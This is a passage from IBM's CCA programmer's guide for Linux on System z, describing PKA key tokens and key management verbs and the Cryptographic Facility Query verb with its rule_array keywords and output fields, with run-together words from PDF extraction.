to use it. (PKApublic key +tokens are used directly in the external form.) +| Formats for public and private external and internal RSAand ECC key tokens begin in “RSApublic key +| token” on page 426. +PKA key management +You can generate RSAand ECC keys using the CCAPKAKey Generate verb. +v Using the Transaction Security System PKAKey Generate verb, or a comparable product from another +vendor. +Chapter3.IntroducingPKAcryptographyandusingPKAverbs 49 + +Encryptedexternal Clearkeyvalues Skeleton key token +keytokenfrom +otherCCAsystem +PKA KeyToken Build PKA Key Generate +Cleartext external +key token +Encryptedexternal +keytoken +PKA Key Import +Internal key token +Figure4.PKAkeymanagement +You can use the PKAKey Generate verb to generate internal and external PKAtokens. You can also +generate RSAkeys on another system and then import them to the cryptographic coprocessor. To input a +clear RSAkey, create the token with the PKAKey Token Build verb and import it using the PKAKey +Import verb. To input an encrypted RSAkey, use the PKAKey Import verb. +In either case, use the PKAKey Token Build verb to create a skeleton key token as input (see “PKAKey +Token Build (CSNDPKB)” on page 377). +The PKAKey Import verb uses the clear token from the PKAKey Token Build verb or a clear or encrypted +token from the CCAsystem to securely import the key token into operational form for the coprocessor to +use. CCAdoes not permit the export of the imported PKAkey. +The PKAPublic Key Extract verb builds a public key token from a private key token. +Application RSApublic and private keys can be stored in the PKAkey storage file. +Key identifier for PKA key token +Akey identifier for a PKAkey token is a variable length (maximum allowed size is 2500 bytes) area that +contains either a key label or a key token. +v Akey label identifies keys that are in the PKAkey storage file. +v Akey token can be either an internal key token, an external key token, or a null key token. Key tokens +are generated by an application (for example, using the PKAKey Generate verb), or received from +another system that can produce external key tokens. +50 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +An internal key token can be used only on the local system, because the PKAmaster key encrypts the +key value. Internal key tokens contain keys in operational form only. +An external key token can be exchanged with other systems because a transport key that is shared +with the other system encrypts the key value. External key tokens contain keys in either exportable or +importable form. +Anull key token consists of eight bytes of binary zeros. The PKAKey Record Create verb can be used +to write a null token to the key storage file. This record can subsequently be identified as the target +token for the PKAKey Import or PKAKey Generate verb. +The term key identifier is used when a parameter could be one of the above items, and indicates that +different inputs are possible. For example, you might want to specify a specific parameter as either an +internal key token or a key label. The key label is, in effect, an indirect reference to a stored internal key +token. +Key label +If the first byte of the key identifier is greater than X'20' but less than X'FF', the field is considered to be +holding a key label. The contents of a key label are interpreted as the identifier of a key entry in the PKA +storage file. The key label is an indirect reference to an internal key token. +If the first byte of the key identifier is X'FF', the identifier is not valid. If the first byte is less than X'20', the +identifier is treated as a key token as described below. +Akey label is specified on verbs with the key_identifier parameter as a 64-byte character string, +left-justified, and padded on the right with blanks. In most cases, the verb does not check the syntax of the +key label other than the first byte. +Akey label has the following form: +Offset Length Data +00-63 64 Keylabelname +Key token +| Akey token is a variable length (maximum allowed size is 3500 bytes) field composed of key value and +| control information. PKAkeys can be either public or private RSA, or ECC keys. Each key token can be +| either an internal key token (the first byte of the key identifier is X'1F'), an external key token (the first byte +| of the key identifier is X'1E'), or a null PKAprivate key token (the first byte of the key identifier is X'00'). +SeeAppendixB, “Key token formats,” on page 421 for descriptions of the PKAkey tokens. +Internal key token +An internal key token is a token that can be used only on the system that created it or another system with +the same PKAmaster key. It contains a key that is encrypted under the PKAmaster key. +An application obtains an internal key token by using one of the verbs such as those listed below. The +verbs are described in detail in Chapter11, “Managing PKAcryptographic keys.” +v PKAKey Generate +v PKAKey Import +| The PKAKey Token Change verb can re-encipher private internal tokens from encryption under the old +| ASYM-MK to encryption under the currentASYM-MK. PKDS Reencipher/Activate options are available to +| re-encipher RSAand ECC internal tokens in the PKDS when the SYM-MK/ASYM-MK (orAPKA-MK) keys +| are changed. +Chapter3.IntroducingPKAcryptographyandusingPKAverbs 51 + +| PKAmaster keys cannot be changed dynamically. +For debugging information, seeAppendixB, “Key token formats” for the format of an internal key token. +External key token +If the first byte of the key identifier is X'1E', the key identifier is interpreted as an external key token.An +external PKAkey token contains key (possibly encrypted) and control information. By using the external +key token, you can exchange keys between systems. +An application obtains the external key token by using one of the verbs such as those listed below. They +are described in detail in Chapter11, “Managing PKAcryptographic keys.” +v PKAPublic Key Extract +v PKAKey Token Build +v PKAKey Generate +For debugging information, seeAppendixB, “Key token formats” for the format of an external key token. +Null key token +If the first byte of the key identifier is X'00', the key identifier is interpreted as a null key token. +For debugging information, seeAppendixB, “Key token formats” for the format of a null key token. +Summary of the PKA verbs +Table8 lists the PKAverbs, described in this book, and their corresponding verb names. The PKAverb +names start with CSND. This table also references the chapter that describes the verb. +Table8.SummaryofPKAverbs +Entrypoint Verbname Description Page +Chapter10,“Usingdigitalsignatures,”onpage359 +|| CSNDDSG DigitalSignatureGenerate GeneratesadigitalsignatureusinganRSAor 360 +| ECCprivatekey. +|| CSNDDSV DigitalSignatureVerify VerifiesadigitalsignatureusinganRSAorECC 364 +| publickey. +Chapter11,“ManagingPKAcryptographickeys” +CSNDPKG PKAKeyGenerate GeneratesanRSAkeypair. 370 +|| CSNDPKI PKAKeyImport Importsakeytokencontainingeitheraclearkey 374 +| oranRSAorECCkeyencipheredundera +| transportkey. +CSNDPKB PKAKeyTokenBuild CreatesanexternalPKAkeytokencontaininga 377 +clearprivateRSAkey.Usingthistokenasinputto +thePKAKeyImportverbreturnsanoperational +internaltokencontaininganencipheredprivate +key.UsingPKAKeyTokenBuildonaclearpublic +RSAkey,returnsthepublickeyinatokenformat +thatotherPKAverbscandirectlyuse.PKAKey +TokenBuildcanalsobeusedtocreateaskeleton +tokenforinputtothePKAKeyGenerateverbfor +thegenerationofaninternalRSAkeytoken. +CSNDKTC PKAKeyTokenChange ChangesPKAkeytokensfromenciphermentwith 385 +theoldasymmetric-keysmasterkeyto +enciphermentwiththecurrentasymmetric-keys +masterkey.Thisverbchangesonlyprivateinternal +tokens. +52 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table8.SummaryofPKAverbs (continued) +Entrypoint Verbname Description Page +CSNDPKT PKAKeyTranslate TranslatesPKAkeytokensfromencipherment 388 +undertheoldAsymmetric-KeysMasterKeyto +enciphermentunderthecurrentAsymmetric-Keys +MasterKey.ThisverbchangesonlyPrivate +InternalPKAKeyTokens. +CSNDPKX PKAPublicKeyExtract ExtractsaPKApublickeytokenfromasupplied 392 +PKAinternalorexternalprivatekeytoken. +PerformsnocryptographicverificationofthePKA +privatetoken. +CSNDRKX RemoteKeyExport SecuretransportofDESkeysusingasymmetric 394 +techniquesfromasecuritymodule(forexample, +theCEX3C)toaremotedevicesuchasan +AutomatedTellerMachine(ATM). +CSNDTBC TrustedBlockCreate Createsanexternaltrustedblockunderdual 403 +control.AtrustedblockisanextensionofCCA +PKAkeytokensusingnewsectionidentifiers. +Chapter3.IntroducingPKAcryptographyandusingPKAverbs 53 + +54 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Part 2. CCA verbs +This part of the document introducesAES, DES and PKAverbs, and includes the following chapters: +| v Chapter4, “Using the CCAnodes and resource control verbs” describes using the CCAresource control +| verbs. +| v Chapter8, “Key storage mechanisms” describes the use of key storage, key tokens, and associated +| verbs. +| v Chapter5, “ManagingAES and DES cryptographic keys” describes the verbs for generating and +| maintainingAES, DES, and HMAC cryptographic keys, the Random Number Generate verb (which +| generates 8-byte random numbers), the Random Number Generate Long verb (which generates up to +| 8192 bytes of random content), and the Secure Sockets Layer (SSL) security protocol. This chapter +| also describes utilities to build DES andAES tokens, generate and translate control vectors, and +| describes the PKAverbs that support DES andAES key distribution. +| v Chapter6, “Protecting data” describes the verbs for enciphering and deciphering data. +| v Chapter7, “Verifying data integrity and authenticating messages” describes the verbs for generating and +| verifying MessageAuthentication Codes (MACs), generating Modification Detection Codes (MDCs) and +| generating hashes (SHA-1, MD5, RIPEMD-160). +| v Chapter9, “Financial services” describes the verbs for use in support of finance-industry applications. +| This includes several categories. +| – Verbs for generating, verifying, and translating personal identification numbers (PINS). +| – Verbs that generate and verify VISAcard verification values andAmerican Express card security +| codes. +| – Verbs to support smart card applications using the EMV (Europay MasterCard Visa) standards. +| v Chapter10, “Using digital signatures” describes the verbs that support using digital signatures to +| authenticate messages. +| v Chapter11, “Managing PKAcryptographic keys” describes the verbs that generate and manage PKA +| keys. +©CopyrightIBMCorp.2007,2011 55 + +56 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| +Chapter 4. Using the CCA nodes and resource control verbs +This chapter describes the following verbs: +v “Cryptographic Facility Query (CSUACFQ)” on page 58 +v “Cryptographic Facility Version (CSUACFV)” on page 84 +v “Cryptographic ResourceAllocate (CSUACRA)” on page 86 +v “Cryptographic Resource Deallocate (CSUACRD)” on page 88 +v “Key Storage Initialization (CSNBKSI)” on page 90 +v “Master Key Process (CSNBMKP)” on page 93 +v “Random Number Tests (CSUARNT)” on page 97 +©CopyrightIBMCorp.2007,2011 57 + +Cryptographic Facility Query (CSUACFQ) +Cryptographic Facility Query (CSUACFQ) +The Cryptographic Facility Query verb is used to retrieve information about the coprocessor and the CCA +application program in that coprocessor. This information includes the following: +v General information about the coprocessor, its operating system, and CCAapplication +v The Environment Identifier (EID) +v Diagnostic information from the coprocessor +v Export-control information from the coprocessor +v Time and date information from the coprocessor +Determining if a card is a CEX2C or CEX3C +Using Cryptographic Facility Query, the output rule_array for option STATCCAis the most accurate way to +determine if you are using a CEX2C or CEX3C: +v If first two characters of the CCAapplication version field are 'z' followed by '3', then this card is a +CEX2C adapter. +An updated device driver might not be available yet for all distributions where this RPM is usable. The +CCAhost library uses this mechanism to determine card version, and we recommend here that the +application developer also use this method. Where this output and the device driver disagree about the +version of a particular card, it is the device driver that will be out of date because the Cryptographic +Facility Query data is not interpreted in any way; it comes direct from the adapter. +v If first character of the CCAapplication version field is a number, such as '4' or greater, then this card is +not a CEX2C. For example, a '4' in the first character indicates a CEX3C. +v The results of this query come directly from the card itself. If the host device driver is not up to date, it +could incorrectly identify a CEX3C as a CEX2C. Therefore, looking at the CCAapplication version field +for the output rule_array for option STATCCAresolves all questions. +The commands ivp.e and panel.exe -x will also tell you whether your cards are CEX3C or CEX2C, by +calling the Cryptographic Facility Query verb for all available adapters. +For details about panel.exe, see “The panel.exe utility” on page 553. +On input, you specify: +v Arule_array_count of 1 or 2 +v Optionally, a rule_array keyword of ADAPTER1 (for backward compatibility) +v The class of information queried with a rule_array keyword +This verb returns information elements in the rule_array and sets the rule_array_count variable to the +number of returned elements. +Format +CSUACFQ( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +verb_data_length, +verb_data ) +58 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input/Output Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. On input, +this value must be 1 or 2. +On output, the verb sets the variable to the number of rule_array elements it returns to the application +program. +Tip: With this verb, the number of returned rule_array elements can exceed the rule_array_count you +specified on input. Be sure you allocate adequate memory to receive all the information elements +according to the information class you select on input with the information-to-return keyword in +the rule_array. +rule_array +Direction: Input/Output Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. +On input, set the rule_array to specify the type of information to retrieve. There are two input +rule_array elements, as described in Table9. +Table9.KeywordsforCryptographicFacilityQuerycontrolinformation +Keyword Description +Adaptertouse(Optional) +ADAPTER1 Thiskeywordisignored.Itisacceptedforbackwardcompatibility. +Informationtoreturn(Onerequired) +STATCCA ObtainsCCA-relatedstatusinformation. +STATCCAE ObtainsCCA-relatedextendedstatusinformation. +STATCARD Obtainscoprocessor-relatedbasicstatusinformation. +STATDIAG Obtainsdiagnosticinformation. +STATEID ObtainstheEnvironmentIdentifier(EID). +STATEXPT Obtainsfunctioncontrolvector-relatedstatusinformation. +TIMEDATE Readsthecurrentdate,time,anddayoftheweekfromthesecureclockwithinthe +coprocessor. +STATAES ObtainsstatusinformationonAESmaster-keyregistersandAESkey-lengthenablement. +STATMOFN Obtainsmaster-keysharesdistributioninformation. +|| STATAPKA ObtainsstatusinformationonAPKAmaster-keyregistersandAPKAkey-length +| enablement. +| ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAPMTHD Obtainsthedefaultkeywrappingmethod. +| ThiskeywordwasintroducedwithCCA4.1.0. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 59 + +Cryptographic Facility Query (CSUACFQ) +Table9.KeywordsforCryptographicFacilityQuerycontrolinformation (continued) +Keyword Description +QPENDING TKEusesthisrule_arraykeywordtorequestinformationaboutpendingchanges +previouslysubmittedbythisTKEoranotherTKEtothisadapter.OnlyTKEcansubmit +changestobestoredinthePendingChangeBufferqueriedwiththiscommand. +ThekeywordisavailablefornormalusersofCryptographicFacilityQuery,for +informationalordebuggingreasons(nosecretsareexposed). +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +STATICSF ThiskeywordreturnstheadapterserialnumberandstatusinformationabouttheSYM +(DES)andASYM(RSA)master-keyregisters,includingwhetheravalidkeyispresentin +eachoftheold,current,andnewregisters. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +GET-UDX ObtainsUDXidentifiers.See“GET-UDX”onpage73. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +STATKPRL Obtainsthenamesoftheoperationalkeyparts.See“STATKPRL”onpage73. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +STATKPR Obtainsnon-secretinformationaboutanoperationalkeypart.See“STATKPR”onpage +73. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +TKESTATE IndicateswhetherTKEaccessisenabledornot. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +STATICSX Obtainstheindicatedmasterkeyhashandverificationpatternstobereturnedforthe +masterkeysloadedinthecurrentdomain.See“STATICSX”onpage81. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +STATICSA Obtainstheindicatedmasterkeyhashandverificationpatternstobereturnedforthe +masterkeysloadedinthecurrentdomain.See“STATICSA”onpage74. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +STATICSE Obtainstheindicatedmasterkeyhashandverificationpatternstobereturnedforthe +masterkeysloadedinthecurrentdomain.See“STATICSE”onpage76. +ThiskeywordappliesonlywhenusingLinuxonIBMSystemz. +|| STATICSB Obtainstheindicatedmasterkeyhashandverificationpatternstobereturnedforthe +| masterkeysloadedinthecurrentdomain.See“STATICSB”onpage78. +| ThiskeywordwasintroducedwithCCA4.1.0.ThiskeywordappliesonlywhenusingLinux +| onIBMSystemz. +The format of the output rule_array depends on the value of the rule_array element, which identifies +the information to be returned. Different sets of rule_array elements are returned depending on +whether the input keyword is STATCCA, STATCCAE, STATCARD, STATDIAG, STATEID, STATEXPT, +STATMOFN, or TIMEDATE. +For rule_array elements that contain numbers, those numbers are represented by numeric characters +which are left-aligned and padded on the right with space characters. For example, a rule_array +element that contains the number 2 contains the character string “2 ” (the number 2 followed +by seven space characters). +On output, the rule_array elements can have the values shown in Table10 on page 61. +60 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array +Elementnumber Name Description +Outputrule_arrayforoptionSTATCCA +1 NMKstatus Thestateofthenewmaster-keyregister: +Value Description +1 Theregisterisclear. +2 Theregistercontainsapartiallycompletekey. +3 Theregistercontainsakey. +2 CMKstatus Thestateofthecurrentmaster-keyregister: +Value Description +1 Theregisterisclear. +2 Theregistercontainsakey. +3 OMKstatus Thestateoftheoldmaster-keyregister: +Value Description +1 Theregisterisclear. +2 Theregistercontainsakey. +4 CCAapplication AcharacterstringthatidentifiestheversionoftheCCAapplicationprogram +version runninginthecoprocessor. +Iffirsttwocharactersare'z'followedby'3',thenthiscardisaCEX2C +adapter(nomatterwhatdevicedriverindicates). +Iffirstcharacterisanumber,suchas'4'orgreater,thenthiscardisnota +CEX2C.Forexample,a'4'inthefirstcharacterindicatesaCEX3C. +Theresultsofthisquerycomedirectlyfromthecarditself.Ifthehostdevice +driverisnotuptodate,itcouldincorrectlyidentifyaCEX3CasaCEX2C. +Therefore,lookingatthisfieldresolvesallquestions. +5 CCAapplication AcharacterstringcontainingthebuilddatefortheCCAapplicationprogram +builddate runninginthecoprocessor. +6 Userrole Acharacterstringcontainingtheroleidentifierwhichdefinesthehost +applicationuser'scurrentauthority. +Outputrule_arrayforoptionSTATCCAE +1 SymmetricNMK Thestateofthesymmetricnewmaster-keyregister: +status +Value Description +1 Theregisterisclear. +2 Theregistercontainsapartiallycompletekey. +3 Theregistercontainsakey. +2 SymmetricCMK Thestateofthesymmetriccurrentmaster-keyregister: +status +Value Description +1 Theregisterisclear. +2 Theregistercontainsakey. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 61 + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +3 SymmetricOMK Thestateofthesymmetricoldmaster-keyregister: +status +Value Description +1 Theregisterisclear. +2 Theregistercontainsakey. +4 CCAapplication AcharacterstringthatidentifiestheversionoftheCCAapplicationprogram +version thatisrunninginthecoprocessor. +5 CCAapplication AcharacterstringcontainingthebuilddatefortheCCAapplicationprogram +builddate thatisrunninginthecoprocessor. +6 Userrole Acharacterstringcontainingtheroleidentifierwhichdefinesthehost +applicationuser'scurrentauthority. +7 AsymmetricNMK Thestateoftheasymmetricnewmaster-keyregister: +status +Value Description +1 Theregisterisclear. +2 Theregistercontainsapartiallycompletekey. +3 Theregistercontainsakey. +8 AsymmetricCMK Thestateoftheasymmetriccurrentmaster-keyregister: +status +Value Description +1 Theregisterisclear. +2 Theregistercontainsakey. +9 AsymmetricOMK Thestateoftheasymmetricoldmaster-keyregister: +status +Value Description +1 Theregisterisclear. +2 Theregistercontainsakey. +Outputrule_arrayforoptionSTATCARD +1 Numberof Anumericcharacterstringcontainingthenumberofactivecoprocessors +installedadapters installedinthemachine.ThisincludesonlycoprocessorsthathaveCCA +softwareloaded(includingthosewithCCAUDXsoftware).Non-CCA +coprocessorsarenotincludedinthisnumber. +2 DEShardware Anumericcharacterstringcontaininganintegervalueidentifyingthe +level versionofDEShardwareonthecoprocessor. +3 RSAhardware Anumericcharacterstringcontaininganintegervalueidentifyingthe +level versionofRSAhardwareonthecoprocessor. +4 POSTversion Acharacterstringidentifyingtheversionofthecoprocessor'sPower-OnSelf +Test(POST)firmware. +ThefirstfourcharactersdefinethePOST0versionandthelastfour +charactersdefinethePOST1version. +5 Coprocessor Acharacterstringidentifyingtheoperatingsystemfirmwareonthe +operatingsystem coprocessor. +name +62 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +6 Coprocessor Acharacterstringidentifyingtheversionofthecoprocessor'soperating +operatingsystem systemfirmware. +version +7 Coprocessorpart Acharacterstringcontainingthe8characterpartnumberidentifyingthe +number versionofthecoprocessor. +8 CoprocessorEC Acharacterstringcontainingthe8characterengineeringchange(EC)level +level forthisversionofthecoprocessor. +9 Minibootversion Acharacterstringidentifyingtheversionofthecoprocessor'sminiboot +firmware.Thisfirmwarecontrolstheloadingofprogramsintothe +coprocessor. +ThefirstfourcharactersdefinetheMiniBoot0versionandthelastfour +charactersdefinetheMiniBoot1version. +10 CPUspeed Anumericcharacterstringcontainingtheoperatingspeedofthe +microprocessorchip,inmegahertz. +11 AdapterID(see Auniqueidentifiermanufacturedintothecoprocessor.Thecoprocessor +alsoelement adapterIDisan8-bytebinaryvalue. +number15) +12 Flashmemorysize AnumericcharacterstringcontainingthesizeoftheflashEPROMmemory +onthecoprocessor,in64KBincrements. +13 DRAMmemory AnumericcharacterstringcontainingthesizeofthedynamicRAM(DRAM) +size memoryonthecoprocessor,inkilobytes. +14 Battery-backed Anumericcharacterstringcontainingthesizeofthebattery-backedRAM +memorysize onthecoprocessor,inkilobytes. +15 Serialnumber Acharacterstringcontainingtheuniqueserialnumberofthecoprocessor. +Theserialnumberisfactoryinstalled. +Outputrule_arrayforoptionSTATDIAG +1 Batterystate Anumericcharacterstringcontainingavaluewhichindicateswhetherthe +batteryonthecoprocessorneedstobereplaced: +Value Description +1 Thebatteryisgood. +2 Thebatteryshouldbereplaced. +2 Intrusionlatch Anumericcharacterstringcontainingavaluewhichindicateswhetherthe +state intrusionlatchonthecoprocessorissetorcleared: +Value Description +1 Thelatchiscleared. +2 Thelatchisset. +3 Errorlogstatus Anumericcharacterstringcontainingavaluewhichindicateswhetherthere +isdatainthecoprocessorCCAerrorlog: +Value Description +1 Theerrorlogisempty. +2 Theerrorlogcontainsabnormalterminationdata,butisnotyetfull. +3 Theerrorlogisfullandcannotholdanymoredata. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 63 + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +4 Meshintrusion Anumericcharacterstringcontainingavaluetoindicatewhetherthe +coprocessorhasdetectedtamperingwiththeprotectivemeshthat +surroundsthesecuremodule.Thisindicatesaprobableattemptto +physicallypenetratethemodule: +Value Description +1 Nointrusionhasbeendetected. +2 Anintrusionattempthasbeendetected. +5 Lowvoltage Anumericcharacterstringcontainingavaluetoindicatewhethera +detected power-supplyvoltagewasbelowtheminimumacceptablelevel.Thismight +indicateanattempttoattackthesecuritymodule: +Value Description +1 Onlyacceptablevoltageshavebeendetected. +2 Avoltagehasbeendetectedbelowthelow-voltagetamper +threshold. +6 Highvoltage Anumericcharacterstringcontainingavalueindicateswhethera +detected power-supplyvoltagewasgreaterthanthemaximumacceptablelevel.This +mightindicateanattempttoattackthesecuritymodule: +Value Description +1 Onlyacceptablevoltageshavebeendetected. +2 Avoltagehasbeendetectedgreaterthanthehigh-voltagetamper +threshold. +7 Temperaturerange Anumericcharacterstringcontainingavaluetoindicatewhetherthe +exceeded temperatureinthesecuremodulewasoutsideoftheacceptablelimits.This +mightindicateanattempttoattackthesecuritymodule: +Value Description +1 Thetemperatureisacceptable. +2 Thetemperaturehasbeendetectedoutsideofanacceptablelimit. +8 Radiationdetected Anumericcharacterstringcontainingavaluetoindicatewhetherradiation +wasdetectedinsidethesecuremodule.Thismightindicateanattemptto +attackthesecuritymodule: +Value Description +1 Noradiationhasbeendetected. +2 Radiationhasbeendetected. +9,11,13,15,17 Last5commands Thesefiverule_arrayelementscontainthelastfivecommandsthatwere +run runbythecoprocessorCCAapplication.Theyareinchronologicalorder, +withthemostrecentcommandinelement9.Eachelementcontainsthe +securityAPIcommandcodeinthefirstfourcharactersandthe +subcommandcodeinthelastfourcharacters. +10,12,14,16,18 Last5return Thesefiverule_arrayelementscontainthesecurityAPIreturncodesand +codes reasoncodescorrespondingtothefivecommandsinrule_arrayelements9, +11,13,15,and17.Eachelementcontainsthereturncodeinthefirstfour +charactersandthereasoncodeinthelastfourcharacters. +64 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +Outputrule_arrayforoptionSTATEID +1,2 EID Thetwoelements,whenconcatenated,providethe16-byteEnvironment +Identifier(EID)value. +Outputrule_arrayforoptionSTATEXPT +1 BaseCCA AnumericcharacterstringcontainingavaluetoindicatewhetherbaseCCA +services servicesareavailable: +availability +Value Description +0 BaseCCAservicesarenotavailable. +1 BaseCCAservicesareavailable. +3 56-bitDES Anumericcharacterstringcontainingavaluetoindicatewhether56-bit +availability DESencryptionisavailable: +Value Description +0 56-bitDESencryptionisnotavailable. +1 56-bitDESencryptionisavailable. +4 Triple-DES AnumericcharacterstringcontainingavaluetoindicatewhetherTriple-DES +availability encryptionisavailable: +Value Description +0 Triple-DESencryptionisnotavailable. +1 Triple-DESencryptionisavailable. +5 SETservices AnumericcharacterstringcontainingavaluetoindicatewhetherSET +availability (secureelectronictransaction)servicesareavailable: +Value Description +0 SETservicesarenotavailable. +1 SETservicesareavailable. +Note: TheSETservicesarenotsupportedintheLinuxonIBMSystemz +environment. +6 Maximummodulus Anumericcharacterstringcontainingthemaximummodulussizeenabled +forsymmetrickey fortheencryptionofsymmetrickeys.Thisdefinesthelongestpublic-key +encryption modulusthatcanbeusedforkeymanagementofsymmetric-algorithm +keys. +Outputrule_arrayforoptionTIMEDATE +1 Date ThecurrentdateisreturnedasacharacterstringoftheformYYYYMMDD, +where: +YYYY Representstheyear. +MM Representsthemonth(01-12). +DD Representsthedayofthemonth(01-31). +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 65 + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +2 Time ThecurrentUTCtimeofdayisreturnedasacharacterstringoftheform +HHMMSS,where: +HH Representsthehour(0-23). +MM Representstheminute(0-59). +SS Representssecond(0-59). +3 Dayoftheweek Thedayoftheweekisreturnedasanumberbetween1(Sunday)and7 +(Saturday). +Outputrule_arrayforoptionQPENDING +1 Changetype AnASCIInumberthatindicatesthetypeofpendingchangestoredinthe +(ASCIInumber) adapter(ifthereisone) +Value Description +none Nopendingchange +1 Roleload +2 Profileload +3 Roledelete +4 Profiledelete +5 Domainzeroize +6 Enable +2 userID(string) AstringofeightASCIIcharactersfortheuserIDoftheuserwhoinitiated +thependingchange. +Outputrule_arrayforoptionGET-UDX +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72 +Outputrule_arrayforoptionSTATKPRL +Thiskeywordcausesalistofallthenamesprovidedforloadedoperationalkeyparts.Thekeypartsareonly +loadablefromtheTKEusingTKE-specificsecuredverbs. +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72. +Outputrule_arrayforoptionSTATKPR +ThiskeywordhasINPUTverb_dataaswellasOUTPUTverb_data.Anameforanoperationalkeypartisexpected +tobeprovidedintheverb_datafield,withanappropriatelysetverb_data_length.Thisnamemustmatchexactlya +namereturnedbytheSTATKPRLkeywordtolistoperationalkeypartnames,andhavethesamelength. +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72. +Outputrule_arrayforoptionTKESTATE +1 TKEaccess IndicateswhetheraTKEcanbeusedtoadministerthisCEX3C.Valuesare: +enabled TKEPERM Allowed +TKEDENY Notallowed +Outputrule_arrayforoptionSTATICSF +1 Cardserial EightASCIIcharactersfortheadapterserialnumber +number +66 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +2 DESnew AnASCIInumbershowingthestateoftheDESnewmaster-kyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +3 DEScurrent AnASCIInumbershowingthestateoftheDEScurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +4 DESold AnASCIInumbershowingthestateoftheDESoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +5 PKAnew AnASCIInumbershowingthestateofthePKAnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +6 PKAcurrent AnASCIInumbershowingthestateofthePKAcurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +7 PKAold AnASCIInumbershowingthestateofthePKAoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +Outputrule_arrayforoptionSTATICSX +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72. +1 Cardserial EightASCIIcharactersfortheadapterserialnumber +number +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 67 + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +2 DESnew AnASCIInumbershowingthestateoftheDESnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +3 DEScurrent AnASCIInumbershowingthestateoftheDEScurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +4 DESold AnASCIInumbershowingthestateoftheDESoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +5 PKAnew AnASCIInumbershowingthestateofthePKAnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +6 PKAcurrent AnASCIInumbershowingthestateofthePKAcurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +7 PKAold AnASCIInumbershowingthestateofthePKAoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +Outputrule_arrayforoptionSTATICSA +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72. +1 Cardserial EightASCIIcharactersfortheadapterserialnumber +number +68 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) 